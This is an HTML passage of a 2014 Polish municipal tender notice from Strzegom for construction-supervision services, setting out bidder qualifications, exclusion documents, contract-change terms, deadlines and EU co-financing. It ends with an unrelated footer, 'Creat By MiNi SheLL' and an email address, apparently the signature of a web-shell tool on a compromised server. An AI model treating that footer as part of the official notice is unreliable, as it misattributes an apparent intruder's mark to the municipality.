<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>a) w specjalności instalacyjnej w zakresie  sieci, instalacji i urządzeń: wodociągowych                                       
 i kanalizacyjnych:
Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał  /osoba, którą dysponuje lub będzie dysponować wykonała co najmniej jedną usługę nadzoru nad budową, lub przebudową, bądź rozbudową sieci kanalizacji deszczowej bądź sanitarnej o wartości minimum 300 000zł brutto,

b)  w specjalności drogowej:
Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał / osoba, którą dysponuje lub będzie dysponować wykonała  co najmniej jedną usługę nadzoru nad budową, lub przebudową, bądź rozbudową drogi 
o wartości minimum 1 000 000zł brutto, 

c) w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych
i elektroenergetycznych:
Zamawiający uzna spełnienie warunku, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 
lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał / osoba, którą dysponuje lub będzie dysponować wykonała co najmniej jedną usługę nadzoru nad budową, lub  przebudową, bądź rozbudową oświetlenia drogowego o wartości minimum 100 000 zł brutto.

Nadzory te mogą stanowić odrębne zamówienie lub wchodzić w zakres jednego przedsięwzięcia.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wzór umowy, która zawarta będzie z Wykonawcą stanowi załącznik nr 5 do SIWZ. Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach, jak w projekcie umowy.
2.  Zgodnie z postanowieniami art.144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania zmian po zawarciu umowy w sprawie zamówienia publicznego, pod warunkiem podpisania aneksu zaakceptowanego przez obie Strony. 
W szczególności Zamawiający dopuszcza: 
1) aktualizację danych Wykonawcy i Zamawiającego poprzez: zmianę nazwy firmy, zmianę adresu siedziby, zmianę formy prawnej itp.;
2) zmiany terminów realizacji zamówienia z przyczyn niezależnych od Wykonawcy lub          
Zamawiającego, które to przyczyny każda ze Stron musi udokumentować w tym m.in.: 
      - spowodowane nieprzewidzianymi w SIWZ nadzwyczajnymi warunkami jak: niewypały 
i niewybuchy, wykopaliska archeologiczne i inne przyczyny zewnętrzne skutkujące obiektywną niemożliwością prowadzenia prac lub wykonywania innych czynności;
      - spowodowane koniecznością usunięcia istotnych błędów lub wprowadzenia istotnych zmian w dokumentacji projektowej - nie ujawnionych przed wszczęciem postępowania 
o udzielenie zamówienia publicznego;
      - spowodowane wystąpieniem robót zamiennych, uzupełniających lub dodatkowych, od wykonania których uzależnione jest wykonanie zamówienia podstawowego - jeżeli terminy ich zlecenia, rodzaj lub zakres, uniemożliwiają dotrzymanie pierwotnego terminu umownego;
      - będące następstwem wstrzymania robót przez uprawnione organy, z przyczyn nie wynikających z winy Wykonawcy lub będące następstwem działania organów administracji 
i innych podmiotów o kompetencjach zbliżonych do organów administracji, w szczególności eksploatatorów infrastruktury;
3) zmianę umowy w przypadku zmiany przepisów prawa obowiązujących na dzień zawarcia umowy w  zakresie mającym wpływ na realizację umowy, w tym zmiany ustawowej stawki podatku od towarów i usług VAT, prowadzącej do zmiany kwoty brutto;
      4) zmianę umowy w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń instytucji, która przyznała środki na sfinansowanie zamówienia lub/i umowy na roboty budowlane,
5) zmianę umowy w zakresie kluczowego personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze;
6) zmianę umowy w zakresie podwykonawstwa, za uprzednią zgodą Zamawiającego: możliwe jest powierzenie podwykonawcom innej części zamówienia niż wskazana w ofercie wykonawcy, a także możliwa zmiana podwykonawcy na etapie realizacji przedmiotu zamówienia o ile nie sprzeciwia się to postanowieniom SIWZ.
3. Warunki dokonywania zmian:
1)	inicjowanie zmian na wniosek Wykonawcy lub Zamawiającego,
2)   uzasadnienie zmiany prawidłową realizacją przedmiotu umowy,
3)	zmiany umowy, o których mowa powyżej  muszą być dokonywane z zachowaniem przepisu art. 140 ust. 3  ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych   
(Dz. U. z 2013r. poz. 907 z późn. zm.) stanowiącego, że umowa podlega unieważnieniu  
w części wykraczającej poza określenie przedmiotu zamówienia zawarte w SIWZ,
4)	forma pisemna jako aneks do umowy pod rygorem nieważności.

4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.strzegom.pl (pod ogłoszeniem)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski, Rynek 38, 58-150 Strzegom, pok. 15 lub za zaliczeniem pocztowym. Cena specyfikacji 21,30 zł (plus koszty przesyłki).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2014 godzina 11:30, miejsce: miejsce: Urząd Miejski, Rynek 38, 58-150 Strzegom - Wydział Obsługi Interesanta, parter - pok. 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie 1 planowane jest do dofinansowania ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 (Priorytet IX  Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działanie 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców).
IV.4.7) Uprawnionymi do kontaktowania się z Wykonawcami w sprawach formalnych jest pani Monika Pawlik - tel. 74/ 8 560 533, w sprawach związanych z przedmiotem zamówienia jest pani Leokadia Chmielewska - tel. 74/ 8560 551. 
IV.4.8) Zamawiający nie zamierza zawierać umowy ramowej. 
IV.4.9) Zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com